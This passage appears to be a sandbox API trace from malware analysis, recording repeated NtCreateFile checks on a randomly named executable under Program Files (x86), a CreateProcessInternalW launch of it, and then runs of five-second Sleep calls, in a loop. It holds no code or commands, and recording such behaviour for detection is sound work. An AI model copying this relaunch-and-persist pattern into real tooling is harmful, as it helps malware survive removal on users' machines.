ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1520, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.668] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.668] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65580) returned 1 [0189.668] NtQueryInformationFile (in: FileHandle=0x1520, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.668] NtClose (Handle=0x1520) returned 0x0 [0189.668] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.668] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1520, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.668] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.668] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65f80) returned 1 [0189.668] NtClose (Handle=0x1520) returned 0x0 [0189.671] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2134, hThread=0x1520, dwProcessId=0x139c, dwThreadId=0x1368), hNewToken=0x0) returned 1 [0189.686] Sleep (dwMilliseconds=0x1388) [0189.687] Sleep (dwMilliseconds=0x1388) [0189.689] Sleep (dwMilliseconds=0x1388) [0189.691] Sleep (dwMilliseconds=0x1388) [0189.692] Sleep (dwMilliseconds=0x1388) [0189.694] Sleep (dwMilliseconds=0x1388) [0189.695] Sleep (dwMilliseconds=0x1388) [0189.700] Sleep (dwMilliseconds=0x1388) [0189.701] Sleep (dwMilliseconds=0x1388) [0189.702] Sleep (dwMilliseconds=0x1388) [0189.704] Sleep (dwMilliseconds=0x1388) [0189.706] Sleep (dwMilliseconds=0x1388) [0189.707] Sleep (dwMilliseconds=0x1388) [0189.710] Sleep (dwMilliseconds=0x1388) [0189.711] Sleep (dwMilliseconds=0x1388) [0189.717] Sleep (dwMilliseconds=0x1388) [0189.719] Sleep (dwMilliseconds=0x1388) [0189.720] Sleep (dwMilliseconds=0x1388) [0189.722] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.722] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2158, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.722] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.723] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64d00) returned 1 [0189.723] NtQueryInformationFile (in: FileHandle=0x2158, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.723] NtClose (Handle=0x2158) returned 0x0 [0189.723] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.723] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2158, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.723] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.723] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65580) returned 1 [0189.723] NtClose (Handle=0x2158) returned 0x0 [0189.726] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20fc, hThread=0x2158, dwProcessId=0x12c0, dwThreadId=0xbfc), hNewToken=0x0) returned 1 [0189.828] Sleep (dwMilliseconds=0x1388) [0189.830] Sleep (dwMilliseconds=0x1388) [0189.831] Sleep (dwMilliseconds=0x1388) [0189.833] Sleep (dwMilliseconds=0x1388) [0189.834] Sleep (dwMilliseconds=0x1388) [0189.836] Sleep (dwMilliseconds=0x1388) [0189.837] Sleep (dwMilliseconds=0x1388) [0189.839] Sleep (dwMilliseconds=0x1388) [0189.845] Sleep (dwMilliseconds=0x1388) [0189.846] Sleep (dwMilliseconds=0x1388) [0189.848] Sleep (dwMilliseconds=0x1388) [0189.859] Sleep (dwMilliseconds=0x1388) [0189.861] Sleep (dwMilliseconds=0x1388) [0189.863] Sleep (dwMilliseconds=0x1388) [0189.865] Sleep (dwMilliseconds=0x1388) [0189.866] Sleep (dwMilliseconds=0x1388) [0189.868] Sleep (dwMilliseconds=0x1388) [0189.869] Sleep (dwMilliseconds=0x1388) [0189.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.871] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2104, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.871] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.871] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65a80) returned 1 [0189.871] NtQueryInformationFile (in: FileHandle=0x2104, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.871] NtClose (Handle=0x2104) returned 0x0 [0189.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.871] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2104, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.871] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.871] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65a80) returned 1 [0189.871] NtClose (Handle=0x2104) returned 0x0 [0189.876] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2144, hThread=0x2104, dwProcessId=0x848, dwThreadId=0x88c), hNewToken=0x0) returned 1 [0189.898] Sleep (dwMilliseconds=0x1388) [0189.899] Sleep (dwMilliseconds=0x1388) [0189.900] Sleep (dwMilliseconds=0x1388) [0189.902] Sleep (dwMilliseconds=0x1388) [0189.906] Sleep (dwMilliseconds=0x1388) [0190.440] Sleep (dwMilliseconds=0x1388) [0190.951] Sleep (dwMilliseconds=0x1388) [0191.073] Sleep (dwMilliseconds=0x1388) [0191.105] Sleep (dwMilliseconds=0x1388) [0191.144] Sleep (dwMilliseconds=0x1388) [0191.169] Sleep (dwMilliseconds=0x1388) [0191.173] Sleep (dwMilliseconds=0x1388) [0191.177] Sleep (dwMilliseconds=0x1388) [0191.178] Sleep (dwMilliseconds=0x1388) [0191.180] Sleep (dwMilliseconds=0x1388) [0191.181] Sleep (dwMilliseconds=0x1388) [0191.183] Sleep (dwMilliseconds=0x1388) [0191.184] Sleep (dwMilliseconds=0x1388) [0191.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.186] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2118, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.190] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.190] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0191.190] NtQueryInformationFile (in: FileHandle=0x2118, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.190] NtClose (Handle=0x2118) returned 0x0 [0191.190] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.190] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2118, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.190] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.190] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0191.190] NtClose (Handle=0x2118) returned 0x0 [0191.193] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2128, hThread=0x2118, dwProcessId=0x844, dwThreadId=0xdb8), hNewToken=0x0) returned 1 [0191.210] Sleep (dwMilliseconds=0x1388) [0191.211] Sleep (dwMilliseconds=0x1388) [0191.212] Sleep (dwMilliseconds=0x1388) [0191.214] Sleep (dwMilliseconds=0x1388) [0191.215] Sleep (dwMilliseconds=0x1388) [0191.217] Sleep (dwMilliseconds=0x1388) [0191.219] Sleep (dwMilliseconds=0x1388) [0191.220] Sleep (dwMilliseconds=0x1388) [0191.222] Sleep (dwMilliseconds=0x1388) [0191.224] Sleep (dwMilliseconds=0x1388) [0191.225] Sleep (dwMilliseconds=0x1388) [0191.227] Sleep (dwMilliseconds=0x1388) [0191.228] Sleep (dwMilliseconds=0x1388) [0191.230] Sleep (dwMilliseconds=0x1388) [0191.231] Sleep (dwMilliseconds=0x1388) [0191.233] Sleep (dwMilliseconds=0x1388) [0191.234] Sleep (dwMilliseconds=0x1388) [0191.236] Sleep (dwMilliseconds=0x1388) [0191.241] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.241] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2130, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.241] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.241] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64700) returned 1 [0191.241] NtQueryInformationFile (in: FileHandle=0x2130, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.241] NtClose (Handle=0x2130) returned 0x0 [0191.241] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.241] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2130, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.241] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.241] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65900) returned 1 [0191.241] NtClose (Handle=0x2130) returned 0x0 [0191.243] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x212c, hThread=0x2130, dwProcessId=0x810, dwThreadId=0x1258), hNewToken=0x0) returned 1 [0191.256] Sleep (dwMilliseconds=0x1388) [0191.257] Sleep (dwMilliseconds=0x1388) [0191.268] Sleep (dwMilliseconds=0x1388) [0191.272] Sleep (dwMilliseconds=0x1388) [0191.273] Sleep (dwMilliseconds=0x1388) [0191.275] Sleep (dwMilliseconds=0x1388) [0191.276] Sleep (dwMilliseconds=0x1388) [0191.278] Sleep (dwMilliseconds=0x1388) [0191.279] Sleep (dwMilliseconds=0x1388) [0191.281] Sleep (dwMilliseconds=0x1388) [0191.282] Sleep (dwMilliseconds=0x1388) [0191.283] Sleep (dwMilliseconds=0x1388) [0191.287] Sleep (dwMilliseconds=0x1388) [0191.288] Sleep (dwMilliseconds=0x1388) [0191.290] Sleep (dwMilliseconds=0x1388) [0191.291] Sleep (dwMilliseconds=0x1388) [0191.293] Sleep (dwMilliseconds=0x1388) [0191.294] Sleep (dwMilliseconds=0x1388) [0191.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.296] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x210c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.296] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.296] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0191.296] NtQueryInformationFile (in: FileHandle=0x210c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.296] NtClose (Handle=0x210c) returned 0x0 [0191.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.296] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x210c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.296] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.296] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64980) returned 1 [0191.296] NtClose (Handle=0x210c) returned 0x0 [0191.298] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2124, hThread=0x210c, dwProcessId=0xc54, dwThreadId=0x1298), hNewToken=0x0) returned 1 [0191.309] Sleep (dwMilliseconds=0x1388) [0191.311] Sleep (dwMilliseconds=0x1388) [0191.312] Sleep (dwMilliseconds=0x1388) [0191.314] Sleep (dwMilliseconds=0x1388) [0191.315] Sleep (dwMilliseconds=0x1388) [0191.317] Sleep (dwMilliseconds=0x1388) [0191.319] Sleep (dwMilliseconds=0x1388) [0191.320] Sleep (dwMilliseconds=0x1388) [0191.322] Sleep (dwMilliseconds=0x1388) [0191.327] Sleep (dwMilliseconds=0x1388) [0191.329] Sleep (dwMilliseconds=0x1388) [0191.331] Sleep (dwMilliseconds=0x1388) [0191.332] Sleep (dwMilliseconds=0x1388) [0191.335] Sleep (dwMilliseconds=0x1388) [0191.337] Sleep (dwMilliseconds=0x1388) [0191.339] Sleep (dwMilliseconds=0x1388) [0191.340] Sleep (dwMilliseconds=0x1388) [0191.342] Sleep (dwMilliseconds=0x1388) [0191.343] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0191.343] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x20f0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.343] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0191.344] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0191.344] NtQueryInformationFile (in: FileHandle=0x20f0, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0191.344] NtClose (Handle=0x20f0) returned 0x0 [0191.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | 